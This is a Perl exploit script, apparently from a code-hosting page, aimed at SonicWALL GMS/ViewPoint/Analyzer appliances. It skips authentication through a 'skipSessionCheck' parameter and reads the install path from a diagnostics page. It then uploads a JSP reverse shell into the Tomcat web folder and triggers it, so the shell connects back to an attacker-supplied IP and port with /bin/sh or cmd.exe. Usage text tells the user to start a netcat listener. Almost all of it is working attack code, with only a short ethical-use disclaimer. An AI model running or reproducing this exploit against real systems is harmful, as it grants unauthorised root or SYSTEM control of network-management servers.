216 lines
No EOL
6 KiB
Perl
Executable file
216 lines
No EOL
6 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
|
|
##
|
|
# Title: SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit
|
|
# Name: sgmsRCE.pl
|
|
# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
|
|
#
|
|
# Use it only for education or ethical pentesting! The author accepts
|
|
# no liability for damage caused by this tool.
|
|
#
|
|
##
|
|
|
|
|
|
use strict;
|
|
use HTTP::Request::Common qw(POST);
|
|
use LWP::UserAgent;
|
|
use LWP::Protocol::https;
|
|
use Getopt::Std;
|
|
|
|
|
|
my %args;
|
|
getopt('hlp:', \%args);
|
|
|
|
my $victim = $args{h} || usage();
|
|
my $lip = $args{l};
|
|
my $lport = $args{p};
|
|
my $detect = $args{d};
|
|
my $shellname = "cbs.jsp";
|
|
|
|
banner();
|
|
|
|
my $gms_path;
|
|
my $target;
|
|
my $sysshell;
|
|
|
|
my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0,},);
|
|
$agent->agent("Mozilla/5.0 (X11; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0");
|
|
|
|
# Place your Proxy here if needed
|
|
#$agent->proxy(['http', 'https'], 'http://localhost:8080/');
|
|
|
|
print "[+] Checking host ...\n";
|
|
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
|
|
Content_Type => 'application/x-www-form-urlencoded; charset=UTF-8',
|
|
Content => [ num => "123456",
|
|
action => "show_diagnostics",
|
|
task => "search",
|
|
item => "application_log",
|
|
criteria => "*.*",
|
|
width => "500",
|
|
];
|
|
|
|
my $result = $agent->request($request);
|
|
|
|
if ($result->is_success) {
|
|
print "[+] Host looks vulnerable ...\n";
|
|
} else {
|
|
print "[-] Error while connecting ... $result->status_line\n";
|
|
exit(0);
|
|
}
|
|
|
|
|
|
my @lines=split("\n",$result->content);
|
|
|
|
foreach my $line (@lines) {
|
|
if ($line =~ /OPTION VALUE=/) {
|
|
my @a=split("\"", $line);
|
|
if ($a[1] =~ m/logs/i) {
|
|
my @b=split(/logs/i,$a[1]);
|
|
$gms_path=$b[0];
|
|
}
|
|
if ($gms_path ne "") {
|
|
print "[+] GMS Path: $gms_path\n";
|
|
last;
|
|
} else {
|
|
next;
|
|
}
|
|
}
|
|
}
|
|
if ($gms_path eq "") {
|
|
print "[-] Couldn't get the GMS path ... Maybe not vulnerable\n";
|
|
exit(0);
|
|
}
|
|
|
|
|
|
if ($gms_path =~ m/^\//) {
|
|
$target="UNX";
|
|
$gms_path=$gms_path."Tomcat/webapps/appliance/";
|
|
$sysshell="/bin/sh";
|
|
print "[+] Target ist Unix...\n";
|
|
} else {
|
|
$target="WIN";
|
|
$gms_path=$gms_path."Tomcat\\webapps\\appliance\\";
|
|
$sysshell="cmd.exe";
|
|
print "[+] Target ist Windows...\n";
|
|
}
|
|
|
|
&_writing_shell;
|
|
|
|
if (!$detect) {
|
|
print "[+] Uploading shell ...\n";
|
|
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
|
|
Content_Type => 'multipart/form-data',
|
|
Content => [ action => "file_system",
|
|
task => "uploadFile",
|
|
searchFolder => "$gms_path",
|
|
uploadFileName => ["$shellname"]
|
|
];
|
|
|
|
my $result = $agent->request($request);
|
|
|
|
if ($result->is_success) {
|
|
print "[+] Upload completed ...\n";
|
|
} else {
|
|
print "[-] Error while connecting ... $result->status_line\n";
|
|
exit(0);
|
|
}
|
|
|
|
unlink("$shellname");
|
|
|
|
print "[+] Spawning remote root/system shell ...\n";
|
|
my $result = $agent->get("$victim/appliance/$shellname");
|
|
|
|
if ($result->is_success) {
|
|
print "[+] Have fun ...\n";
|
|
} else {
|
|
print "[-] Error while connecting ... $result->status_line\n";
|
|
exit(0);
|
|
}
|
|
}
|
|
|
|
sub _writing_shell {
|
|
open FILE, ">", "$shellname" or die $!;
|
|
print FILE << "EOF";
|
|
<%\@page import="java.lang.*"%>
|
|
<%\@page import="java.util.*"%>
|
|
<%\@page import="java.io.*"%>
|
|
<%\@page import="java.net.*"%>
|
|
<%
|
|
class StreamConnector extends Thread
|
|
{
|
|
InputStream is;
|
|
OutputStream os;
|
|
|
|
StreamConnector( InputStream is, OutputStream os )
|
|
{
|
|
this.is = is;
|
|
this.os = os;
|
|
}
|
|
public void run()
|
|
{
|
|
BufferedReader in = null;
|
|
BufferedWriter out = null;
|
|
try
|
|
{
|
|
in = new BufferedReader( new InputStreamReader( this.is ) );
|
|
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
|
|
char buffer[] = new char[8192];
|
|
int length;
|
|
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
|
|
{
|
|
out.write( buffer, 0, length );
|
|
out.flush();
|
|
}
|
|
} catch( Exception e ){}
|
|
try
|
|
{
|
|
if( in != null )
|
|
in.close();
|
|
if( out != null )
|
|
out.close();
|
|
} catch( Exception e ){}
|
|
}
|
|
}
|
|
try
|
|
{
|
|
Socket socket = new Socket( "$lip", $lport );
|
|
Process process = Runtime.getRuntime().exec( "$sysshell" );
|
|
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
|
|
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
|
|
} catch( Exception e ) {}
|
|
%>
|
|
|
|
EOF
|
|
|
|
close(FILE);
|
|
}
|
|
|
|
sub usage {
|
|
print "\n";
|
|
print " $0 - SonicWALL GMS/VIEWPOINT/Analyzer Remote Root/SYSTEM exploit\n";
|
|
print "====================================================================\n\n";
|
|
print " Usage:\n";
|
|
print " $0 -h <http://victim> -l <yourip> -p <yourport>\n";
|
|
print " Notes:\n";
|
|
print " Start your netcat listener <nc -lp 4444>\n";
|
|
print " -d only checks if the Host is vulnerable\n";
|
|
print "\n";
|
|
print " Author:\n";
|
|
print " Nikolas Sotiriu (lofi)\n";
|
|
print " url: www.sotiriu.de\n";
|
|
print " mail: lofi[at]sotiriu.de\n";
|
|
print "\n";
|
|
|
|
|
|
exit(1);
|
|
}
|
|
|
|
sub banner {
|
|
print STDERR << "EOF";
|
|
--------------------------------------------------------------------------------
|
|
SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit
|
|
--------------------------------------------------------------------------------
|
|
|
|
EOF
|
|
} |